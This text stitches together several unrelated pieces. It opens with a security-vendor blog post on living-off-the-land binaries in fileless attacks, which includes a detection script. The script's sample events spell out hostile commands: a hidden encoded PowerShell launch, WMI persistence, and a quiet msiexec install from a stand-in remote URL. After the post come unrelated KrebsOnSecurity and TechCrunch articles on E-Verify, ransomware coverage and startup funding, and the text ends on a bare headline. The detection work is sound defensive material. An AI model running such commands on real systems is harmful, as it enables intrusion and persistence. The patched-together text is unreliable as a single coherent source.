How Do Attackers Use LOLBins In Fileless Attacks?

For malware authors, the idea of exploiting existing software on a user’s machine to achieve malicious purposes has a lot of attractions. For one, it means less work for them in developing custom malware. For another, it means less chance of being detected. After all, if you can hijack an existing and trusted piece of software to achieve your ends, the chances are better that you’ll go undetected. This technique, known as “Living off the Land”, has a long history, but it’s not getting old.

New “Living off the Land” binaries, or LOLBins, can appear with any software or OS update, or may have been lying around with undocumented abilities for some time: researchers at SentinelLabs just disclosed a previously unknown LOLBin, for example. In this post, we dig into what LOLBins are, why they are a concern, and most importantly how you can detect their malicious use.

What is a LOLBin?

Any executable that comes installed as part of your operating system by default that can be used to further an attack can be considered a LOLBin. In addition, executables added by users for legitimate purposes could be exploited as a LOLBin, particularly if it is part of some common or widely used 3rd party software installation.

The key to understanding what a LOLBin is revolves less around its origin and more around whether the executable is found on the system prior to the malware attack.

In such cases, that executable is likely to be treated without suspicion by both users and admins and potentially even whitelisted as benign by some security tools.

In targeted attacks, an actor may first surveil a system for LOLBins unique to the victim’s environment, but typically attackers are interested in efficiency and prefer to write malware that will make use of commonly found executables, such as scripting engines like bash and PowerShell as well as utilities like msiexec, psexec and desktopimgdownldr, which have unexpected or little-known capabilities useful to threat actors. On macOS, osascript is a LOLBin widely exploited by attackers for executing malicious AppleScripts.

Aside from being potentially ignored by both users and security tools, LOLBins like those just mentioned can allow malicious actors to communicate with remote servers and blend in with typical network activity. Other LOLBins may help attackers to perform functions such as compile code, achieve persistence, dump processes and hijack DLLs.

How Do Attackers Use LOLBins In Fileless Attacks?

Fileless attacks have been increasing in recent years, although there is some misunderstanding about exactly what makes an attack ‘fileless’. Such attacks may still be initiated through documents (like email attachments) and they may leave behind files (like persistence agents), but what makes them fileless is that the code is executed in-memory.

The main idea behind a fileless attack is that code execution occurs in-memory rather than by spawning a process that executes compiled code from a source file.

This means that the attack cannot be detected just by scanning a system for malicious binaries or executable files. In addition, once memory has been purged (such as by a reboot) there may be little or no evidence of the attack for incident responders and threat hunters to detect.

A typical scenario for a fileless attack might begin with a phishing attempt, in which the target is socially engineered to click on a malicious link or attachment. This may execute JavaScript or VBScript or call a LOLBin like PowerShell to download and execute malicious code in-memory.

This second-stage payload may go on to use other LOLBins like WMI (Windows Management Instrumentation) to execute code to do things like achieve persistence, open a backdoor or contact a C2 server to exfiltrate data. Fileless attacks may be combined with other threats such as ransomware and keyloggers.

What Are Some Examples of Fileless Attacks Using LOLBins?

Fileless attacks using LOLBins are quite common and have been documented on Windows, Linux and Mac platforms. Indeed, insofar as the attack can hijack native tools that either exist on all platforms or have equivalents, these kinds of attacks can be platform-agnostic. APT group Lazarus, for example, has been observed distributing MS Word documents that will execute an in-memory attack using LOLBins regardless of whether the attachment is opened on Windows or a Mac.

[Image: Visual Basic “Sub autorun” macro]

Among the more high-profile attacks that have leveraged LOLBins and a fileless attack vector were those on the DNC (Democratic National Committee) in the previous US election year and the attack on Equifax in 2017 that resulted in billion-dollar losses for the company and the exposure of records belonging to nearly 150 million people.

Why Do Security Researchers Worry About LOLBins?

As we have seen, LOLBins present a problem because they are a legitimate part of the environment that can be coerced to do the threat actors’ work for them. Of course, some LOLBins like PowerShell are well-known and can be monitored and/or locked down to prevent abuse.

However, keeping an inventory of the functionality of every legitimate executable on the system and whether it could be leveraged for malicious purposes isn’t really practical. Not only do operating systems contain a vast number of built-in binaries that are being added to or updated with new functionality all the time, there is also a massive amount of widely used 3rd party software in the enterprise environment whose full functionality may not be documented.

As a result, security practitioners are continually engaged in research to unearth new or undiscovered LOLBins before attackers do.

But even when discovered, there remains the problem of how to deal with the use of that legitimate tool to ensure it is being used only for its intended purpose.

How Can You Detect the Malicious Use of LOLBins?

With no recognizable file signature and ever-changing C2 IP addresses, security teams can be engaged in a wearying game of whack-a-mole trying to chase stealthy attacks that their current tools are not equipped to handle.

In many scenarios, it is simply not effective to block LOLBins that may be essential to the productivity of some of the teams in your organization.

The key to defeating attacks leveraging LOLBins lies in a behavioral AI engine that can detect malicious behavior based on what code does, rather than where it comes from. Rather than inspecting files to see if they contain malicious code, a behavioral AI engine looks at activity on the endpoint and distinguishes between malicious and benign activity.

Using contextual information, the agent can not only recognize that some activity is malicious, but can also distinguish the source of the malicious activity without laying the blame at the door of the native tool invoked by the malicious process.
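The detection approach the preceding sections describe, judging a process by what it does and by the context it runs in rather than by the reputation of the binary, can be illustrated at a very simple level with process-creation telemetry. The following is an added example written for this post; it is not SentinelOne’s engine or any product’s code. It scores constructed process-creation events of the kind Sysmon or an EDR agent would record (parent image, image, command line) against the fileless chain outlined above: a document handler spawning a script engine, an encoded or hidden PowerShell invocation, a download cradle, a built-in such as msiexec pulling a package from a remote URL, and a WMI event-subscription consumer being created. The field names, the indicator lists, the weights and the four sample events are all assumptions chosen for illustration.

```python
"""Heuristic scoring of LOLBin abuse in process-creation events.

Added example, not SentinelOne code. Field names, indicator lists, weights
and sample events are constructed for illustration; real telemetry carries
more fields and the weights need tuning to the environment.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # image path of the parent process
    image: str    # image path of the created process
    cmdline: str  # full command line of the created process


# Document handlers that should rarely spawn script engines or other LOLBins.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script engines typically used for the first, in-memory stage.
SCRIPT_ENGINES = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Other built-ins with download, execute or persistence capabilities.
OTHER_LOLBINS = {"wmic.exe", "msiexec.exe", "regsvr32.exe", "rundll32.exe",
                 "certutil.exe", "desktopimgdownldr.exe"}

# (name, weight, pattern): command-line traits of download-and-execute, evasion
# and WMI persistence. Weights are illustrative.
CMD_INDICATORS = [
    ("encoded_command", 2, re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")),
    ("download_cradle", 2, re.compile(r"(?i)(downloadstring|downloadfile|invoke-webrequest|net\.webclient)")),
    ("invoke_expression", 2, re.compile(r"(?i)(\biex\b|invoke-expression)")),
    ("hidden_window", 1, re.compile(r"(?i)(^|\s)-w(indowstyle)?\s+hidden\b")),
    ("wmi_subscription", 3, re.compile(r"(?i)root\\subscription|__EventFilter|CommandLineEventConsumer")),
    ("remote_url", 2, re.compile(r"(?i)https?://")),
    ("silent_install", 1, re.compile(r"(?i)(^|\s)/(q|qn|quiet)\b")),
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons) for one event; context (parent) counts as much as content."""
    parent, image = basename(ev.parent), basename(ev.image)
    score, reasons = 0, []
    lolbin = image in SCRIPT_ENGINES or image in OTHER_LOLBINS
    if parent in OFFICE_PARENTS and lolbin:
        score += 3
        reasons.append(f"office_spawned_lolbin:{parent}->{image}")
    if lolbin:
        for name, weight, pattern in CMD_INDICATORS:
            if pattern.search(ev.cmdline):
                score += weight
                reasons.append(name)
    return score, reasons


def detect(events, threshold=3):
    """Return [(event, score, reasons)] for events at or above the threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, score, reasons))
    return hits


# Constructed sample events; the base64 blob is a placeholder (encoded "AAAA...").
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ=="),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe Get-ChildItem C:\Users\alice\Documents"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\wbem\wmic.exe",
              r'wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="constructed"'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /q /i https://updates.example.invalid/pkg.msi"),
]

if __name__ == "__main__":
    for ev, score, reasons in detect(SAMPLE_EVENTS):
        print(f"[{score}] {basename(ev.parent)} -> {basename(ev.image)}: {', '.join(reasons)}")
```

Run as-is, the script flags the Word-spawned encoded PowerShell, the WMI consumer creation and the quiet remote msiexec install, while the interactive `Get-ChildItem` from Explorer scores zero even though it is the same binary. Rules of this shape are what a SIEM or EDR correlation search would carry; they are only a starting point, since string matching on command lines is easy to evade, which is exactly why the post argues for judging behaviour rather than provenance.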

Conclusion

Stealth is one of every threat actor’s primary objectives, and natively existing binaries, LOLBins, provide perfect camouflage for malware that wants to hide in plain sight. While it’s vital that we continue to research the capabilities in our environment, the task of detecting malicious processes on execution regardless of their source is one that readily lends itself to an automated, machine learning algorithm. If you would like to see how SentinelOne can help protect your organization against all kinds of threat actors, contact us for a free demo.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

E-Verify’s “SSN Lock” is Nothing of the Sort

One of the most-read advice columns on this site is a 2018 piece called “Plant Your Flag, Mark Your Territory,” which tried to impress upon readers the importance of creating accounts at websites like those at the Social Security Administration, the IRS and others before crooks do it for you. A key concept here is that these services only allow one account per Social Security number — which for better or worse is the de facto national identifier in the United States. But KrebsOnSecurity recently discovered that this is not the case with all federal government sites built to help you manage your identity online.

A reader who was recently the victim of unemployment insurance fraud said he was told he should create an account at the Department of Homeland Security‘s myE-Verify website, and place a lock on his Social Security number (SSN) to minimize the chances that ID thieves might abuse his identity for employment fraud in the future.

DHS’s myE-Verify homepage.

According to the website, roughly 600,000 employers at over 1.9 million hiring sites use E-Verify to confirm the employment eligibility of new employees. E-Verify’s consumer-facing portal myE-Verify lets users track and manage employment inquiries made through the E-Verify system. It also features a “Self Lock” designed to prevent the misuse of one’s SSN in E-Verify.

Enabling this lock is supposed to mean that for the next year thereafter, if an unauthorized individual attempts to fraudulently use a SSN for employment authorization, he or she cannot use the SSN in E-Verify, even if the SSN is that of an employment authorized individual. But in practice, this service may actually do little to deter ID thieves from impersonating you to a potential employer.

At the request of the reader who reached out (and in the interest of following my own advice to plant one’s flag), KrebsOnSecurity decided to sign up for a myE-Verify account. After verifying my email address, I was asked to pick a strong password and select a form of multi-factor authentication (MFA). The most secure MFA option offered (a one-time code generated by an app like Google Authenticator or Authy) was already pre-selected, so I chose that.

The site requested my name, address, SSN, date of birth and phone number. I was then asked to select five questions and answers that might be asked if I were to try to reset my password, such as “In what city/town did you meet your spouse,” and “What is the name of the company of your first paid job.” I chose long, gibberish answers that had nothing to do with the questions (yes, these password questions are next to useless for security and frequently are the cause of account takeovers, but we’ll get to that in a minute).

Password reset questions selected, the site proceeded to ask four, multiple-guess “knowledge-based authentication” questions to verify my identity. The U.S. Federal Trade Commission‘s primer page on preventing job-related ID theft says people who have placed a security freeze on their credit files with the major credit bureaus will need to lift or thaw the freeze before being able to answer these questions successfully at myE-Verify. However, I did not find that to be the case, even though my credit file has been frozen with the major bureaus for years.

After successfully answering the KBA questions (the answer to each was “none of the above,” by the way), the site declared I’d successfully created my account! I could then see that I had the option to place a “Self Lock” on my SSN within the E-Verify system.

Doing so required me to pick three more challenge questions and answers. The site didn’t explain why it was asking me to do this, but I assumed it would prompt me for the answers in the event that I later chose to unlock my SSN within E-Verify.

After selecting and answering those questions and clicking the “Lock my SSN” button, the site generated an error message saying something went wrong and it couldn’t proceed.

Alas, logging out and logging back in again showed that the site did in fact proceed and that my SSN was locked. Joy.

But I still had to know one thing: Could someone else come along pretending to be me and create another account using my SSN, date of birth and address but under a different email address? Using a different browser and Internet address, I proceeded to find out.

Imagine my surprise when I was able to create a separate account as me with just a different email address (once again, the correct answers to all of the KBA questions was “none of the above”). Upon logging in, I noticed my SSN was indeed locked within E-Verify. So I chose to unlock it.

Did the system ask any of the challenge questions it had me create previously? Nope. It just reported that my SSN was now unlocked. Logging out and logging back in to the original account I created (again under a different IP and browser) confirmed that my SSN was unlocked.

ANALYSIS

Obviously, if the E-Verify system allows multiple accounts to be created using the same name, address, phone number, SSN and date of birth, this is less than ideal and somewhat defeats the purpose of creating one for the purposes of protecting one’s identity from misuse.

Lest you think your SSN and DOB is somehow private information, you should know this static data about U.S. residents has been exposed many times over in countless data breaches, and in any case these digits are available for sale on most Americans via Dark Web sites for roughly the bitcoin equivalent of a fancy caffeinated drink at Starbucks.

Being unable to proceed through knowledge-based authentication questions without first unfreezing one’s credit file with one or all of the big three credit bureaus (Equifax, Experian and TransUnion) can actually be a plus for those of us who are paranoid about identity theft. I couldn’t find any mention on the E-Verify site of which company or service it uses to ask these questions, but the fact that the site doesn’t seem to care whether one has a freeze in place is troubling.

And when the correct answer to all of the KBA questions that do get asked is invariably “none of the above,” that somewhat lessens the value of asking them in the first place. Maybe that was just the luck of the draw in my case, but also troubling nonetheless. Either way, these KBA questions are notoriously weak security because the answers to them often are pulled from records that are public anyway, and can sometimes be deduced by studying the information available on a target’s social media profiles.

Speaking of silly questions, relying on “secret questions” or “challenge questions” as an alternative method of resetting one’s password is severely outdated and insecure. A 2015 study by Google titled “Secrets, Lies and Account Recovery” (PDF) found that secret questions generally offer a security level that is far lower than just user-chosen passwords. Also, the idea that an account protected by multi-factor authentication could be undermined by successfully guessing the answer(s) to one or more secret questions (answered truthfully and perhaps located by thieves through mining one’s social media accounts) is bothersome.

Finally, the advice given to the reader whose inquiry originally prompted me to sign up at myE-Verify doesn’t seem to have anything to do with preventing ID thieves from fraudulently claiming unemployment insurance benefits in one’s name at the state level. KrebsOnSecurity followed up with four different readers who left comments on this site about being victims of unemployment fraud recently, and none of them saw any inquiries about this in their myE-Verify accounts after creating them. Not that they should have seen signs of this activity in the E-Verify system; I just wanted to emphasize that one seems to have little to do with the other.

The Good, the Bad and the Ugly in Cybersecurity – Week 27

The Good

Another high-profile cybercriminal has received a well-deserved sentence from a federal judge in Alexandria, VA. Aleksei Burkov, who pleaded guilty in January, was charged with conspiracy to commit computer intrusion, device fraud, identity theft, and money laundering stemming from his involvement with two well-known forums. Both forums, one of which was Cardplanet, were long-standing gathering places for cybercriminals to meet and trade stolen information.

The second forum involved was a much more guarded and heavily-vetted environment. The upper echelon would pay $5000 for the privilege of access to the forum and associated services from the participants. Burkov potentially faced 15 years of prison time after being extradited to the United States in November of 2019.

Ultimately the judge sentenced him to 9 years, noting that Burkov had already been incarcerated since 2015. It is estimated that the forums collectively facilitated nearly $20 million in credit card fraud and other identity-based crimes. It’s always good to see these cases end in a positive way (for the good guys!).

The Bad

This week, macOS security got a nasty shock in the form of a rare ransomware threat targeting the platform. Dubbed variously “EvilQuest”, “ThiefQuest” and “MacRansom.K”, this trojan displays both data stealing and encryption (ransomware) traits.

The lure and delivery of the trojan is all too familiar, unfortunately. The malware has been spreading via torrents offering pirated or “cracked” versions of a number of popular macOS applications including Ableton Live, Mixed in Key, and Little Snitch. The malware arrives as a .DMG file containing a package-based installer for the trojanized application. Upon launch, the installer requests elevated privileges, establishes both user-level and root-level persistence, and proceeds to activate additional functionality. Files do indeed get encrypted at this point; however, some additional behaviors occur, adding to the list of malicious activities. “EvilQuest” appears to install a keylogger as well as a reverse shell, potentially allowing the threat actor direct and ongoing access. The malware also retrieves multiple remote scripts, one of which is used specifically for file exfiltration.

The trojan will recursively seek all files under the /Users folder matching a hard-coded extension list and proceed to transmit them externally. Others have noted that there are limits to the file size that can be transferred (800k), which may prevent exfiltration of various file types (.wallet, for example). In addition, there seem to be some issues with the encryption itself, in that filetypes beyond the hard-coded extension set could end up encrypted.

Although analysis is still ongoing, this unusually complex (for macOS) malware looks like a first attempt at targeting the Apple Mac platform with malware that has the same kind of combined ransomware/wiper plus data stealing capabilities seen in malware families hitting the Windows universe of late (e.g., Ragnar, Netwalker, Snake). Expect it not to be the last.

The Ugly

In perhaps this week’s most serious security news, US-CERT, along with many other agencies, released alerts concerning a critical vulnerability in Palo Alto Networks’ PAN-OS. The flaw, assigned CVE-2020-2021, is an authentication bypass in SAML authentication. Through this vulnerability, attackers could potentially execute arbitrary code and take full control of affected devices and systems. More specifically, an unauthenticated attacker (assuming network access) could access the vulnerable resources and log in to perform administrative actions such as opening up interfaces for future stages of attack or modifying permissions on existing accounts.

The problematic SAML implementation exists in code residing on multiple Palo Alto Networks products including VPN Gateways and firewalls: two big places you want to keep attackers out of. Specific software affected includes Prisma Access and GlobalProtect Gateway, among others. Palo Alto Networks posted their advisory on June 29th, which includes mitigation and workaround instructions. SAML can be temporarily disabled to prevent exploitation of the flaw, and a fix has been released in the form of updated versions of PAN-OS.

This is a critical flaw, and thankfully (this time) the vendor has provided a fix in a timely and well-communicated manner. We encourage all to review their exposure to this vulnerability and take the required steps to mitigate. Keeping all applications and services up to date and at the latest patch level, while not always straightforward, is paramount as we strive to defend our networks against current and future attacks.



SEC filing indicates big data provider Palantir is raising $961M, $550M of it already secured

Palantir, the sometimes controversial, but always secretive, big data and analytics provider that works with governments and other public and private organizations to power national security, health and a variety of other services, has reportedly been eyeing a public listing this autumn. But in the meantime it’s also continuing to push ahead in the private markets.

The company has filed a Form D — its first in four years — indicating that it is in the process of raising nearly $1 billion — $961,099,010, to be exact — with $549,727,437 of that already sold, and a further $411,371,573 remaining to be raised.

It’s not clear if this fundraise would essentially mean a delay to a public listing, or if it would complement it. Nor is it clear whether this filing is additionally covering secondary or previously undisclosed funding that it is now getting in order ahead of a public listing. The Form D notes that 58 investors have already invested in the offering, which might indicate that at least some of this is secondary, and that “of the total remaining to be sold, all but $671,576.25 represents shares of common stock already subscribed for.”

The filing, alternatively, could confirm a report from back in September 2019 that the company was seeking to raise between $1 billion and $3 billion, its first fundraising in four years. That report noted Palantir was targeting a $26 billion valuation, up from $20 billion four years ago. A Reuters article from June put its valuation on secondary market trades at between $10 billion and $14 billion.

The bigger story of that Reuters report was that Palantir said in June that it had closed funding from two strategic investors that both work with the company: $500 million in funding from Japanese insurance company Sompo Holdings, and $50 million from Fujitsu. Together, it seems like these might account for $550 million already sold on the Form D.

To date, Palantir has raised $3.3 billion in funding, according to PitchBook data, which names no fewer than 108 investors on its cap table.

If you dig into the PitchBook data (some of which is behind a paywall) it also seems that Palantir has raised a number of other rounds of undisclosed amounts. Confusingly (but probably apt for a company famous for being secretive) some of that might also be part of this Form D amount.

We have reached out to Palantir to ask about the Form D and will update this post as we learn more.

While Palantir was last valued at $20 billion when it raised money four years ago, there are some data points that point to a bigger valuation today.

In April, according to a Bloomberg report, the company briefed investors with documents showing that it expects to make $1 billion in revenues this year, up 38% on 2019, and to break even for the first time since being founded 16 years ago by Peter Thiel, Nathan Gettings, Joe Lonsdale, Stephen Cohen and current CEO Alex Karp.

(The Bloomberg report didn’t explain why Palantir was briefing investors, whether for a potential public listing, or for the fundraise we’re reporting on here, or something else.)

On top of that, the company has been in the news a lot around the global novel coronavirus pandemic. Specifically, it’s been winning business, in the form of projects in major markets like the U.K. (where it’s part of a consortium of companies working with the NHS on a COVID-19 data trove) and the U.S. (where it’s been working on a COVID-19 tracker for the federal government and a project with the CDC), and possibly others. Those projects will presumably need a lot of upfront capital to set up and run, possibly one reason it is raising money now.

QuestDB nabs $2.3M seed to build open source time series database

QuestDB, a member of the Y Combinator summer 2020 cohort, is building an open source time series database with speed top of mind. Today the startup announced a $2.3 million seed round.

Episode1 Ventures led the round with assistance from Seedcamp, 7percent Ventures, Y Combinator, Kima Ventures and several unnamed angel investors.

The database was originally conceived in 2013 when current CTO Vlad Ilyushchenko was building trading systems for a financial services company and he was frustrated by the performance limitations of the databases available at the time, so he began building a database that could handle large amounts of data and process it extremely fast.

For a number of years, QuestDB was a side project, a labor of love for Ilyushchenko until he met his other co-founders Nicolas Hourcard, who became CEO and Tancrede Collard, who became CPO, and the three decided to build a startup on top of the open source project last year.

“We’re building an open source database for time series data, and time series databases are a multi-billion-dollar market because they’re central for financial services, IoT and other enterprise applications. And we basically make it easy to handle explosive amounts of data, and to reduce infrastructure costs massively,” Hourcard told TechCrunch.

He adds that it’s also about high performance. “We recently released a demo that you can access from our website that enables you to query a super large dataset — 1.6 billion rows with sub-second queries, mostly, and that just illustrates how performant the software is,” he said.

He sees open source as a way to build adoption from the bottom up inside organizations, winning the hearts and minds of developers first, then moving deeper in the company when they eventually build a managed cloud version of the product. For now, being open source also helps them as a small team to have a community of contributors help build the database and add to its feature set.

“We’ve got this open source product that is free to use, and it’s pretty important for us to have such a distribution model because we can basically empower developers to solve their problems, and we can ask for contributions from various communities. […] And this is really a way to spur adoption,” Hourcard said.

He says that working with YC has allowed them to talk to other companies in the ecosystem who have built similar open source-based startups and that’s been helpful, but it has also helped them learn to set and meet goals and have access to some of the biggest names in Silicon Valley, including Marc Andreessen, who delivered a talk to the cohort the same day we spoke.

Today the company has seven employees, including the three founders, spread out across the US, EU and South America. He sees this geographic diversity helping when it comes to building a diverse team in the future. “We definitely want to have more diverse backgrounds to make sure that we keep having a diverse team and we’re very strongly committed to that.”

For the short term, the company wants to continue building its community, working on continuing to improve the open source product, while working on the managed cloud product.

Ransomware Gangs Don’t Need PR Help

We’ve seen an ugly trend recently of tech news stories and cybersecurity firms trumpeting claims of ransomware attacks on companies large and small, apparently based on little more than the say-so of the ransomware gangs themselves. Such coverage is potentially quite harmful and plays deftly into the hands of organized crime.

Often the rationale behind couching these events as newsworthy is that the attacks involve publicly traded companies or recognizable brands, and that investors and the public have a right to know. But absent any additional information from the victim company or their partners who may be affected by the attack, these kinds of stories and blog posts look a great deal like ambulance chasing and sensationalism.

Currently, more than a dozen ransomware crime gangs have erected their own blogs to publish sensitive data from victims. A few of these blogs routinely issue self-serving press releases, some of which gallingly refer to victims as “clients” and cast themselves in a beneficent light. Usually, the blog posts that appear on ransom sites are little more than a teaser — screenshots of claimed access to computers, or a handful of documents that expose proprietary or financial information.

The goal behind the publication of these teasers is clear, and the ransomware gangs make no bones about it: To publicly pressure the victim company into paying up. Those that refuse to be extorted are told to expect that huge amounts of sensitive company data will be published online or sold on the dark web (or both).

Emboldened by their successes, several ransomware gangs recently have started demanding two ransoms: One payment to secure a digital key that can unlock files, folders and directories encrypted by their malware, and a second to avoid having any stolen information published or shared with others.

KrebsOnSecurity has sought to highlight ransomware incidents at companies whose core business involves providing technical services to others — particularly managed service providers that have done an exceptionally poor job communicating about the attack with their customers.

Overall, I’ve tried to use each story to call attention to key failures that frequently give rise to ransomware infections, and to offer information about how other companies can avoid a similar fate.

But simply parroting what professional extortionists have posted on their blog about victims of cybercrime smacks of providing aid and comfort to an enemy that needs and deserves neither.

Maybe you disagree, dear readers? Feel free to sound off in the comments below.

Apple device management company Jamf files S-1 as it prepares to go public

Jamf, the Apple device management company, filed to go public today. Jamf might not be a household name, but the Minnesota company has been around since 2002 helping companies manage their Apple equipment.

In the early days, that was Apple computers. Later it expanded to also manage iPhones and iPads. The company launched at a time when most IT pros had few choices for managing Macs in a business setting.

Jamf changed that, and as Macs and other Apple devices grew in popularity inside organizations in the 2010s, the company’s offerings grew in demand. Notably, over the years Apple has helped Jamf and its rivals considerably, by building more sophisticated tooling at the operating system level to help manage Macs and other Apple devices inside organizations.

Jamf raised approximately $50 million of disclosed funding before being acquired by Vista Equity Partners in 2017 for $733.8 million, according to the S-1 filing. Today, the company kicks off the high-profile portion of its journey toward going public.

Apple device management takes center stage

In a case of interesting timing, Jamf is filing to go public less than a week after Apple bought mobile device management startup Fleetsmith. At the time, Apple indicated that it would continue to partner with Jamf as before, but with its own growing set of internal tooling, which could at some point begin to compete more rigorously with the market leader.

Other companies in the space managing Apple devices besides Jamf and Fleetsmith include Addigy and Kandji. Other more general offerings in the mobile device management (MDM) space include MobileIron and VMware Airwatch among others.

Vista is a private equity shop with a specific thesis around buying out SaaS and other enterprise companies, growing them, and then exiting them onto the public markets or getting them acquired by strategic buyers. Examples include Ping Identity, which the firm bought in 2016 before taking it public last year, and Marketo, which Vista bought in 2016 for $1.8 billion and sold to Adobe last year for $4.8 billion, turning a tidy profit.

Inside the machine

Now that we know where Jamf sits in the market, let’s talk about it from a purely financial perspective.

Jamf is a modern software company, meaning that it sells its digital services on a recurring basis. In the first quarter of 2020, for example, about 83% of its revenue came from subscription software. The rest was generated by services and software licenses.

Now that we know what type of company Jamf is, let’s explore its growth, profitability and cash generation. Once we understand those facets of its results, we’ll be able to understand what it might be worth and if its IPO appears to be on solid footing.

We’ll start with growth. In 2018 Jamf recorded $146.6 million in revenue, which grew to $204.0 million in 2019. That works out to an annual growth rate of 39.2%, a more than reasonable pace of growth for a company going public. It’s not super quick, mind, but it’s not slow either. More recently, the company grew 36.9% from $44.1 million in Q1 2019 to $60.4 million in revenue in Q1 2020. That’s a bit slower, but not too much slower.

Turning to profitability, we need to start with the company’s gross margins. Then we’ll talk about its net margins. And, finally, adjusted profits.

Gross margins help us understand how valuable a company’s revenue is. The higher the gross margins, the better. SaaS companies like Jamf tend to have gross margins of 70% or above. In Jamf’s own case, it posted gross margins of 75.1% in Q1 2020, and 72.5% in 2019. Jamf’s gross margins sit comfortably in the realm of SaaS results, and, perhaps even more importantly, are improving over time.

Getting behind the curtain

When all its expenses are accounted for, the picture is less rosy, and Jamf is unprofitable. The company’s net losses for 2018 and 2019 were similar, totaling $36.3 million and $32.6 million, respectively. Jamf’s net loss improved a little in Q1, falling from $9.0 million in 2019 to $8.3 million this year.

The company remains weighed down by debt, however, which cost it nearly $5 million in Q1 2020, and $21.4 million for all of 2019. According to the S-1, Jamf is sporting a debt-to-equity ratio of roughly 0.8, which may be a bit higher than your average public SaaS company, and is almost certainly a function of the company’s buyout by a private equity firm.

But the company’s adjusted profit metrics strip out debt costs, and under the heavily massaged adjusted earnings before interest, taxes, depreciation and amortization (EBITDA) metric, Jamf’s history is only one of rising profitability: from $6.6 million in 2018 to $20.8 million in 2019, and from $4.3 million in Q1 2019 to $5.6 million in Q1 2020, with close to 10% adjusted operating profit margins through YE 2019.

It will be interesting to see how the company’s margins will be affected by COVID-19, with financials during the period still left blank in this initial version of the S-1. The Enterprise market in general has been reasonably resilient to the recent economic shock, and device management may actually perform above expectations, given the growing push for remote work.

Completing the picture

Something notable about Jamf is that it has positive cash generation, even if in Q1 it tends to consume cash that is made up for in other quarters. In 2019, the firm posted $11.2 million in operational cash flow. That’s a good result, and better than 2018’s $9.4 million of operating cash generation. (The company’s investing cash flows have often run negative due to Jamf acquiring other companies, like ZuluDesk and Digita.)

With Jamf, we have a SaaS company that is growing reasonably well, has solid, improving margins, non-terrifying losses, growing adjusted profits and what looks like a reasonable cash flow perspective. But Jamf is cash poor, with just $22.7 million in cash and equivalents as of the end of Q1 2020 — some months ago now. At that time, the firm also had debts of $201.6 million.

Given the company’s worth, that debt figure is not terrifying. But the company’s thin cash balance makes it a good IPO candidate; going public will raise a chunk of change for the company, giving it more operating latitude and also possibly a chance to lower its debt load. Indeed, Jamf notes that it intends to use part of its IPO raise “to repay outstanding borrowings under our term loan facility…” Paying back debt at IPO is common in private equity buyouts.

So what?

Jamf’s march to the public markets adds its name to a growing list of companies. The market is already preparing to ingest Lemonade and Accolade this week, and there are rumors of more SaaS companies in the wings, just waiting to go public.

There’s a reasonable chance that as COVID-19 continues to run roughshod over the United States, the public markets eventually lose some momentum. But that isn’t stopping companies like Jamf from rolling the dice and taking a chance going public.

Fauna raises an additional $27M to turn databases into a simple API call

Databases have always been a complex part of the equation for developers requiring a delicate balance to manage inside the application, but Fauna wants to make adding a database a simple API call, and today it announced $27 million in new funding.

The round, which is technically an extension of the company’s 2017 Series A, was led by Madrona Venture Group with participation from Addition, GV, CRV, Quest Ventures and a number of individual investors. Today’s investment brings the total raised to $57 million, according to the company.

While it was at it, the company also added some executive fire power, announcing that it was bringing on former Okta chief product officer Eric Berg as CEO and former Snowflake CEO Bob Muglia as Chairman.

Companies like Stripe for payments and Twilio for communications are the poster children for the move to APIs. Instead of building sophisticated functionality from scratch, a developer can use an API call to a service, and presto, has the tooling built in without any fuss. Fauna does the same thing for databases.

“Within a few lines of code with Fauna, developers can add a full-featured globally distributed database to their applications. They can simplify code, reduce costs and ship faster because they never again worry about database issues such as correctness, capacity, scalability, replication, etc,” new CEO Berg told TechCrunch.

To automate the process even further, the database is serverless, meaning that it scales up or down automatically to meet the needs of the application. Company co-founder Evan Weaver, who has moved to CTO with the hiring of Berg, says that Stripe is a good example of how this works. “You don’t think about provisioning Stripe because you don’t have to. […] You sign up for an account and beyond that you don’t have to provision or operate anything,” Weaver explained.

Like most API companies, Fauna is working at the developer level to build community and developer consensus around its product. Today, it has 25,000 developers using the tool. While there is no open-source version, the company tries to attract developer interest with a generous free tier, after which you can pay as you go or set up fixed monthly pricing as you scale up.

The company has always been 100% remote, so when COVID hit, it didn’t really change anything about the way the company’s 40 employees work. As the company grows, Berg says it has aggressive goals around diversity and inclusion.

“Our recruiting and HR team have some pretty aggressive targets in terms of thinking about diversity in our pipelines and in our recruiting efforts, and because we’re a small team today we have the ability to impact that as we grow. If we doubled the size of the company, we could shift those percentages pretty dramatically, so it’s something that is definitely top of mind for us.”

Weaver says that fundraising began at the beginning of this year before COVID hit, but the term sheet wasn’t signed until March. He admits being nervous throughout the process, especially as the pandemic took hold. A company like Fauna is highly technical and takes time to grow, and he worried that getting investors to understand that was challenging even without a bleak economic picture.

“It’s a deep tech business and it takes real capital to grow and scale. It’s a high-risk, high-reward bet, which is easier to fund in boom times, but broadly I think the best companies get built during recessions when there’s less competition for talent and there’s more focus on capital.”

Vendia raises $5.1M for its multi-cloud serverless platform

